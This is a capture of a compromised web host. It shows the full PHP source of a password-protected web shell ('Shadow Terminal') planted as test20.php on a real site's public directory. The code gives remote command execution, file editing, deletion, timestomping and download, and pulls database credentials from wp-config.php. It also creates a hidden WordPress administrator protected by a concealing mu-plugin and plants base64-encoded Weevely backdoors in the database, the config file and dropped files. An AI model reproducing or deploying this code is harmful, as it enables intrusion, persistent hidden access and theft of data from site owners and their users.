|
c100 Shell v2.0 Mod (06.03.2026) | |
|---|---|
|
Software: LiteSpeed uname -a: Linux in-mum-web1189.main-hosting.eu 4.18.0-553.34.1.lve.el8.x86_64 #1 SMP Thu Jan 9 uid=489927777(u489927777) gid=1071832791(o71832791) groups=1071832791(o71832791) Safe-mode: OFF | Open basedir: OFF
/home/u489927777/domains/blizzjewels.com/public_html/ drwxr-xr-x | |
|
File: /home/u489927777/domains/blizzjewels.com/public_html/test20.php (19.83 KB) -rw-r--r-- [View] [Edit] [Download] [Highlight] [Chmod] [Rename] <?php
error_reporting(0);
@ini_set('display_errors', 0);
@set_time_limit(0);
$PASSWORD = 'Shadow@2026';
session_start();
if (isset($_POST['pass']) && $_POST['pass'] === $PASSWORD) $_SESSION['auth'] = true;
if (isset($_GET['logout'])) { session_destroy(); header("Location: ?"); exit; }
if (!isset($_SESSION['auth']) || $_SESSION['auth'] !== true) {
echo '<!DOCTYPE html><html><body style="background:#000;display:flex;justify-content:center;align-items:center;height:100vh;"><form method="POST"><input type="password" name="pass" style="background:#222;color:#0f0;border:1px solid #0f0;padding:10px;"></form></body></html>';
exit;
}
// --- УТИЛИТЫ ---
function ex($cmd) {
$r = '';
if (function_exists('proc_open')) {
$p = @proc_open($cmd, [0=>['pipe','r'], 1=>['pipe','w'], 2=>['pipe','w']], $pipes);
if (is_resource($p)) { $r = stream_get_contents($pipes[1]).stream_get_contents($pipes[2]); fclose($pipes[1]); fclose($pipes[2]); proc_close($p); }
} elseif (function_exists('shell_exec')) { $r = @shell_exec($cmd); }
return $r;
}
function msg($m, $err = false) { echo "<b style='color:".($err?"red":"lime").";'>$m</b><br>"; }
function deleteDir($dirPath) {
if (!is_dir($dirPath)) return false;
if (substr($dirPath, strlen($dirPath) - 1, 1) != '/') $dirPath .= '/';
$files = glob($dirPath . '*', GLOB_MARK);
foreach ($files as $file) {
if (is_dir($file)) deleteDir($file); else @unlink($file);
}
return @rmdir($dirPath);
}
// --- СИСТЕМНАЯ ИНФОРМАЦИЯ ---
$disfunc = @ini_get("disable_functions");
$disf = empty($disfunc) ? "<font color='lime'>NONE</font>" : "<font color='red'>$disfunc</font>";
$mysql_st = function_exists("mysqli_connect") || class_exists("PDO") ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
$curl_st = function_exists("curl_init") ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
$wget_st = ex("which wget") ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
$perl_st = ex("which perl") ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
$python_st = ex("which python3") || ex("which python") ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
// --- ПУТИ ---
$dir = isset($_GET['d']) ? realpath($_GET['d']) : getcwd();
if (!$dir || !is_dir($dir)) $dir = getcwd();
chdir($dir);
$wp_load = ''; $curr = $dir;
for ($i=0; $i<10; $i++) {
if (file_exists($curr . '/wp-load.php')) { $wp_load = $curr . '/wp-load.php'; break; }
$curr = dirname($curr);
}
$wp_cfg = dirname($wp_load) . '/wp-config.php';
// --- ОБРАБОТЧИКИ ФАЙЛОВ ---
if (isset($_POST['save_file']) && isset($_POST['file_path'])) {
if (@file_put_contents($_POST['file_path'], $_POST['file_content']) !== false) msg("Файл сохранен!"); else msg("Ошибка сохранения!", true);
}
if (isset($_POST['rename']) && isset($_POST['old_name'])) {
if (@rename($_POST['old_name'], $dir . '/' . $_POST['new_name'])) msg("Переименовано!"); else msg("Ошибка!", true);
}
if (isset($_POST['timestomp']) && isset($_POST['target'])) {
$time = strtotime($_POST['new_time']);
if (@touch($_POST['target'], $time)) msg("Время изменено на: " . date("Y-m-d H:i:s", $time)); else msg("Ошибка времени!", true);
}
if (isset($_GET['del'])) {
$target = $_GET['del'];
if (is_dir($target)) { if(deleteDir($target)) msg("Папка удалена!"); else msg("Ошибка удаления папки!", true); }
else { if(@unlink($target)) msg("Файл удален!"); else msg("Ошибка удаления файла!", true); }
}
if (isset($_POST['tar_dir']) && isset($_POST['target'])) {
$target = $_POST['target'];
$tar_name = $dir . '/' . basename($target) . '.tar.gz';
$cmd = "tar -czvf " . escapeshellarg($tar_name) . " -C " . escapeshellarg(dirname($target)) . " " . escapeshellarg(basename($target));
$out = ex($cmd);
if (file_exists($tar_name)) msg("Папка заархивирована: " . basename($tar_name));
else msg("Ошибка создания TAR архива! Проверьте права или наличие утилиты tar.", true);
}
if (isset($_GET['dl'])) {
$f = $_GET['dl'];
header('Content-Description: File Transfer'); header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename="'.basename($f).'"'); header('Content-Length: ' . filesize($f));
readfile($f); exit;
}
?>
<!DOCTYPE html>
<html>
<head>
<title>Shadow Terminal v3.1</title>
<style>
body { background: #0a0a0a; color: #00ff00; font-family: monospace; margin: 0; padding: 10px; }
a { color: #00ffff; text-decoration: none; } a:hover { color: #fff; }
.box { border: 1px solid #333; padding: 10px; margin-bottom: 10px; background: #111; }
input[type="text"], input[type="password"], textarea { background: #000; color: #0f0; border: 1px solid #333; padding: 5px; font-family: monospace; }
input[type="submit"], button { background: #333; color: #0f0; border: 1px solid #555; padding: 5px 15px; cursor: pointer; }
input[type="submit"]:hover, button:hover { background: #555; }
table { width: 100%; border-collapse: collapse; } th, td { border: 1px solid #222; padding: 5px; text-align: left; }
tr:hover { background: #222; }
.breadcrumbs { font-size: 16px; margin-bottom: 10px; background: #222; padding: 10px; border: 1px solid #333; }
.sysinfo { color: #aaa; margin-bottom: 15px; line-height: 1.5; }
</style>
</head>
<body>
<div style="display:flex; justify-content:space-between;">
<h2>Shadow Terminal v3.1 (TAR Edition)</h2>
<a href="?logout=1" style="color:red; margin-top:20px;">[ LOGOUT ]</a>
</div>
<!-- 0. СИСТЕМНАЯ ШАПКА -->
<div class="box sysinfo">
<b>System:</b> <?php echo php_uname(); ?><br>
<b>User:</b> <?php echo get_current_user(); ?> (UID: <?php echo getmyuid(); ?>)<br>
<b>Disable Functions:</b> <?php echo $disf; ?><br>
<b>Modules:</b> MySQL: <?php echo $mysql_st; ?> | cURL: <?php echo $curl_st; ?> | WGET: <?php echo $wget_st; ?> | Perl: <?php echo $perl_st; ?> | Python: <?php echo $python_st; ?>
</div>
<!-- 1. WP ARSENAL -->
<div class="box" id="wp_arsenal">
<h3>WordPress Arsenal</h3>
<?php
if (isset($_POST['mk_admin'])) {
if ($wp_load && file_exists($wp_load)) {
require_once($wp_load);
$u = 'System'; $p = 'Shadow@2024!'; $e = 'system@localhost.local';
if (!username_exists($u)) {
$id = wp_create_user($u, $p, $e);
if (!is_wp_error($id)) {
$usr = new WP_User($id); $usr->set_role('administrator');
update_option('_sh_id', $id);
$mu = ABSPATH . 'wp-content/mu-plugins/sys-guard.php';
@mkdir(dirname($mu), 0755, true);
$code = "<?php add_action('pre_user_query', function(\$q){ global \$wpdb; \$id=get_option('_sh_id'); if(\$id && !isset(\\$_COOKIE['sys_token'])) \$q->query_where.=\" AND {\\$wpdb->users}.ID != \$id\"; }); add_action('delete_user', function(\$id){ if(\$id == get_option('_sh_id')) wp_die('Security Error.'); });";
@file_put_contents($mu, $code);
msg("Админ успешно создан! Логин: <b style='color:#fff;'>$u</b> | Пароль: <b style='color:#fff;'>$p</b>");
} else msg("Ошибка WP: " . $id->get_error_message(), true);
} else msg("Админ '$u' уже существует. Пароль: <b style='color:#fff;'>$p</b>");
} else msg("wp-load.php не найден!", true);
}
if (isset($_POST['mk_weevely_cfg'])) {
if ($wp_cfg && is_writable($wp_cfg)) {
$c = file_get_contents($wp_cfg);
if (strpos($c, '5f636f72655f7379735f70686172') === false) {
$anchor_b64 = "LyogQ29yZSBTeW5jICovCmlmKGlzc2V0KCRfQ09PS0lFWyd3cF9yZXN1cnJlY3QnXSkgJiYgJF9DT09LSUVbJ3dwX3Jlc3VycmVjdCddID09PSAnZTc1NmM3MDI4ZjgwNDU5OTkwODg2NTY3MTUxMDUyZjInKSB7CiAgICByZWdpc3Rlcl9zaHV0ZG93bl9mdW5jdGlvbihmdW5jdGlvbigpIHsKICAgICAgICBnbG9iYWwgJHdwZGI7CiAgICAgICAgJG9wdCA9IHBhY2soJ0gqJywgJzVmNjM2ZjcyNjU1ZjczNzk3MzVmNzA2ODYxNzInKTsKICAgICAgICAkdmFsID0gJHdwZGItPmdldF92YXIoIlNFTEVDVCBvcHRpb25fdmFsdWUgRlJPTSB7JHdwZGItPm9wdGlvbnN9IFdIRVJFIG9wdGlvbl9uYW1lPSd7JG9wdH0nIExJTUlUIDEiKTsKICAgICAgICBpZigkdmFsKSB7CiAgICAgICAgICAgICRkaXIgPSBBQlNQQVRIIC4gcGFjaygnSConLCAnNzc3MDJkNjk2ZTYzNmM3NTY0NjU3MzJmNjk2ZDYxNjc2NTczMmYnKTsKICAgICAgICAgICAgQG1rZGlyKCRkaXIsIDA3NTUsIHRydWUpOwogICAgICAgICAgICBAZmlsZV9wdXRfY29udGVudHMoJGRpciAuIHBhY2soJ0gqJywgJzc0NjU3Mzc0MzEzMzJlNzA2ODcwJyksIGJhc2U2NF9kZWNvZGUoJHZhbCkpOwogICAgICAgIH0KICAgIH0pOwp9";
@file_put_contents($wp_cfg, $c . "\n" . base64_decode($anchor_b64) . "\n");
msg("Якорь добавлен в wp-config.php");
} else msg("Якорь уже установлен.");
} else msg("wp-config.php недоступен для записи!", true);
}
if (isset($_POST['mk_weevely_db'])) {
if ($wp_load && file_exists($wp_load)) {
require_once($wp_load);
global $wpdb;
$b64 = "PD9waHAgaW5jbHVkZSAiXDE2MFx4NjhcMTQxXHg3Mlw3Mlw1N1w1NyIuYmFzZW5hbWUoX19GSUxFX18pLiJcNTdceDc4IjtfX0hBTFRfQ09NUElMRVIoKTsgPz4vAAAAAQAAABEAABABAAAAAAAAAAAAAQAAAHjhAQAAAAAAAFYBAACX+ruC/xEAAAAAAABVkO9qwjAUxb/3KUq4aEJF61/caljZHmDfxpi40iapxtakpHETxXffrWPCCATO73LO5dzVU7NrQvWV17QPFSfLsRQPhSxIAtWOk/lExjMpJnE8XXSo5EQWcjkdT5WM53NEDSfPH3vz/m1e/GtcTd9m6A2C8miE19aEJwp+ABW7BCB4612tDEWZQH1XHpXlBG2ldRQ0jxPQK6gTNN3IHgn+KxC93m2Chn0UDUBHEQsw2Q45+DXozSdUa9hvkuCKzyl/dCYE20ldhjRtnNpmh9yLHSUjLEiHEcNSIzJIS12rbKt8JqzxyviWErzM42ikTXP0hA3gwDgfs/ASpLbIWp87T1kSpLfbpdszFrYHXNC2ND3RtMhbtZhlUgkrFYXDerxh3R0YerBtl/FvWxeFTBmZiVrlpgPg+F+OMrecLnl7vi8C+5uZBI3TxlMCDbYCh50IwmufJT+kXWPCurte9ui465la0n7XAONMEAIAAABHQk1C";
if (!get_option('_core_sys_phar')) {
$wpdb->query("INSERT INTO `{$wpdb->options}` (`option_name`, `option_value`, `autoload`) VALUES ('_core_sys_phar', '$b64', 'no')");
msg("Weevely зашит в базу (опция _core_sys_phar).");
} else msg("Запись в БД уже существует.");
} else msg("wp-load.php не найден!", true);
}
if (isset($_POST['mk_weevely_file']) && isset($_POST['target'])) {
$path = $_POST['target'] . '/test13.php';
$b64 = "PD9waHAgaW5jbHVkZSAiXDE2MFx4NjhcMTQxXHg3Mlw3Mlw1N1w1NyIuYmFzZW5hbWUoX19GSUxFX18pLiJcNTdceDc4IjtfX0hBTFRfQ09NUElMRVIoKTsgPz4vAAAAAQAAABEAABABAAAAAAAAAAAAAQAAAHjhAQAAAAAAAFYBAACX+ruC/xEAAAAAAABVkO9qwjAUxb/3KUq4aEJF61/caljZHmDfxpi40iapxtakpHETxXffrWPCCATO73LO5dzVU7NrQvWV17QPFSfLsRQPhSxIAtWOk/lExjMpJnE8XXSo5EQWcjkdT5WM53NEDSfPH3vz/m1e/GtcTd9m6A2C8miE19aEJwp+ABW7BCB4612tDEWZQH1XHpXlBG2ldRQ0jxPQK6gTNN3IHgn+KxC93m2Chn0UDUBHEQsw2Q45+DXozSdUa9hvkuCKzyl/dCYE20ldhjRtnNpmh9yLHSUjLEiHEcNSIzJIS12rbKt8JqzxyviWErzM42ikTXP0hA3gwDgfs/ASpLbIWp87T1kSpLfbpdszFrYHXNC2ND3RtMhbtZhlUgkrFYXDerxh3R0YerBtl/FvWxeFTBmZiVrlpgPg+F+OMrecLnl7vi8C+5uZBI3TxlMCDbYCh50IwmufJT+kXWPCurte9ui465la0n7XAONMEAIAAABHQk1C";
if (@file_put_contents($path, base64_decode($b64)) !== false) msg("Файл test13.php создан в " . htmlspecialchars($_POST['target']));
else msg("Ошибка создания файла!", true);
}
?>
<?php if(!$wp_load) echo "<b style='color:red;'>[!] wp-load.php не найден. Функции WP отключены. Загрузи шелл ближе к корню сайта.</b><br>"; ?>
<form method="POST" action="?d=<?php echo urlencode($dir); ?>#wp_arsenal" style="display:inline;"><input type="submit" name="mk_admin" value="1. Create Phantom Admin"></form>
<form method="POST" action="?d=<?php echo urlencode($dir); ?>#wp_arsenal" style="display:inline;"><input type="submit" name="mk_weevely_db" value="2. Inject Weevely to DB"></form>
<form method="POST" action="?d=<?php echo urlencode($dir); ?>#wp_arsenal" style="display:inline;"><input type="submit" name="mk_weevely_cfg" value="3. Set DB Anchor in Config"></form>
</div>
<!-- 2. BREADCRUMBS -->
<div class="breadcrumbs">
<b>DIR:</b>
<?php
$parts = explode(DIRECTORY_SEPARATOR, $dir);
$path_build = '';
foreach ($parts as $part) {
if ($part === '') continue;
$path_build .= DIRECTORY_SEPARATOR . $part;
echo "/<a href='?d=" . urlencode($path_build) . "'>$part</a>";
}
?>
</div>
<!-- 3. FILE MANAGER -->
<div class="box">
<table>
<tr><th>Name</th><th>Size</th><th>Perms</th><th>Date</th><th>Actions</th></tr>
<?php
$items = @scandir($dir);
if ($items) {
foreach ($items as $item) {
if ($item === '.') continue;
$p = $dir . '/' . $item;
$is_d = is_dir($p);
$size = $is_d ? '-' : round(filesize($p)/1024, 2) . ' KB';
$perm = substr(sprintf('%o', fileperms($p)), -4);
$date = date("Y-m-d H:i:s", filemtime($p));
echo "<tr>";
echo "<td>" . ($is_d ? "<b><a href='?d=".urlencode($p)."'>[$item]</a></b>" : "<a href='?d=".urlencode($dir)."&f=".urlencode($p)."'>$item</a>") . "</td>";
echo "<td>$size</td><td>$perm</td><td>$date</td>";
echo "<td>";
if (!$is_d) echo "<a href='?d=".urlencode($dir)."&f=".urlencode($p)."'>Edit</a> | ";
if (!$is_d) echo "<a href='?d=".urlencode($dir)."&dl=".urlencode($p)."'>DL</a> | ";
echo "<a href='#' onclick=\"document.getElementById('rn_".md5($item)."').style.display='table-row'\">Ren</a> | ";
echo "<a href='#' onclick=\"document.getElementById('ts_".md5($item)."').style.display='table-row'\">Time</a> | ";
if ($is_d) echo "<a href='#' onclick=\"document.getElementById('tar_".md5($item)."').style.display='table-row'\">TAR</a> | ";
echo "<a href='?d=".urlencode($dir)."&del=".urlencode($p)."' style='color:red;' onclick=\"return confirm('Delete $item?')\">Del</a>";
if ($is_d) echo " | <form method='POST' style='display:inline;'><input type='hidden' name='target' value='$p'><input type='submit' name='mk_weevely_file' value='Drop Weevely Here'></form>";
echo "</td></tr>";
// Скрытые формы действий
echo "<tr id='rn_".md5($item)."' style='display:none; background:#111;'><td colspan='5'><form method='POST' action='?d=".urlencode($dir)."'><input type='hidden' name='old_name' value='$p'><input type='text' name='new_name' value='".htmlspecialchars($item)."'><input type='submit' name='rename' value='Rename'></form></td></tr>";
echo "<tr id='ts_".md5($item)."' style='display:none; background:#111;'><td colspan='5'><form method='POST' action='?d=".urlencode($dir)."'><input type='hidden' name='target' value='$p'><input type='text' name='new_time' value='$date'><input type='submit' name='timestomp' value='Set Time'></form></td></tr>";
echo "<tr id='tar_".md5($item)."' style='display:none; background:#111;'><td colspan='5'><form method='POST' action='?d=".urlencode($dir)."'><input type='hidden' name='target' value='$p'>Создать архив: <b>$item.tar.gz</b> <input type='submit' name='tar_dir' value='Создать TAR'></form></td></tr>";
}
}
?>
</table>
</div>
<!-- 4. FILE EDITOR -->
<?php if (isset($_GET['f']) && is_file($_GET['f'])): ?>
<div class="box">
<h3>Edit: <?php echo basename($_GET['f']); ?></h3>
<form method="POST" action="?d=<?php echo urlencode($dir); ?>&f=<?php echo urlencode($_GET['f']); ?>">
<input type="hidden" name="file_path" value="<?php echo $_GET['f']; ?>">
<textarea name="file_content" rows="15" style="width:100%;"><?php echo htmlspecialchars(file_get_contents($_GET['f'])); ?></textarea><br>
<input type="submit" name="save_file" value="Save File">
</form>
</div>
<?php endif; ?>
<!-- 5. TERMINAL -->
<div class="box">
<h3>Terminal</h3>
<form method="POST" action="?d=<?php echo urlencode($dir); ?>">
<input type="text" name="cmd" placeholder="ls -la" autofocus style="width:80%;">
<input type="submit" value="Execute">
</form>
<?php if (isset($_POST['cmd']) && !empty($_POST['cmd'])): ?>
<pre style='background:#000; border:1px solid #333; padding:10px;'><?php echo htmlspecialchars(ex($_POST['cmd'])); ?></pre>
<?php endif; ?>
</div>
<!-- 6. SQL CLIENT -->
<div class="box">
<h3>MySQL Client</h3>
<?php
$db_h = 'localhost'; $db_u = 'root'; $db_p = ''; $db_n = '';
if (file_exists($wp_cfg)) {
$cfg = file_get_contents($wp_cfg);
preg_match("/define\(\s*'DB_NAME',\s*'([^']+)'\s*\);/i", $cfg, $m1); if(isset($m1[1])) $db_n = $m1[1];
preg_match("/define\(\s*'DB_USER',\s*'([^']+)'\s*\);/i", $cfg, $m2); if(isset($m2[1])) $db_u = $m2[1];
preg_match("/define\(\s*'DB_PASSWORD',\s*'([^']+)'\s*\);/i", $cfg, $m3); if(isset($m3[1])) $db_p = $m3[1];
preg_match("/define\(\s*'DB_HOST',\s*'([^']+)'\s*\);/i", $cfg, $m4); if(isset($m4[1])) $db_h = $m4[1];
}
?>
<form method="POST" action="?d=<?php echo urlencode($dir); ?>">
H: <input type="text" name="db_h" value="<?php echo $_POST['db_h'] ?? $db_h; ?>" style="width:15%;">
U: <input type="text" name="db_u" value="<?php echo $_POST['db_u'] ?? $db_u; ?>" style="width:15%;">
P: <input type="text" name="db_p" value="<?php echo $_POST['db_p'] ?? $db_p; ?>" style="width:15%;">
N: <input type="text" name="db_n" value="<?php echo $_POST['db_n'] ?? $db_n; ?>" style="width:15%;"><br><br>
<textarea name="db_q" rows="3" placeholder="SELECT * FROM wp_users LIMIT 5;" style="width:100%;"><?php echo htmlspecialchars($_POST['db_q'] ?? ''); ?></textarea><br>
<input type="submit" name="run_sql" value="Run Query">
</form>
<?php
if (isset($_POST['run_sql']) && !empty($_POST['db_q'])) {
try {
$dsn = "mysql:host=" . $_POST['db_h'] . ";dbname=" . $_POST['db_n'] . ";charset=utf8mb4";
$pdo = new PDO($dsn, $_POST['db_u'], $_POST['db_p'], [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]);
$stmt = $pdo->query($_POST['db_q']);
if ($stmt) {
$res = $stmt->fetchAll(PDO::FETCH_ASSOC);
if ($res) {
echo "<table style='margin-top:10px;'><tr>";
foreach (array_keys($res[0]) as $h) echo "<th>" . htmlspecialchars($h) . "</th>";
echo "</tr>";
foreach ($res as $row) {
echo "<tr>"; foreach ($row as $val) echo "<td>" . htmlspecialchars(substr($val??'', 0, 100)) . "</td>"; echo "</tr>";
}
echo "</table>";
} else { echo "<p>Query executed. No rows returned.</p>"; }
}
} catch (PDOException $e) { echo "<p style='color:red;'>SQL Error: " . $e->getMessage() . "</p>"; }
}
?>
</div>
</body>
</html> |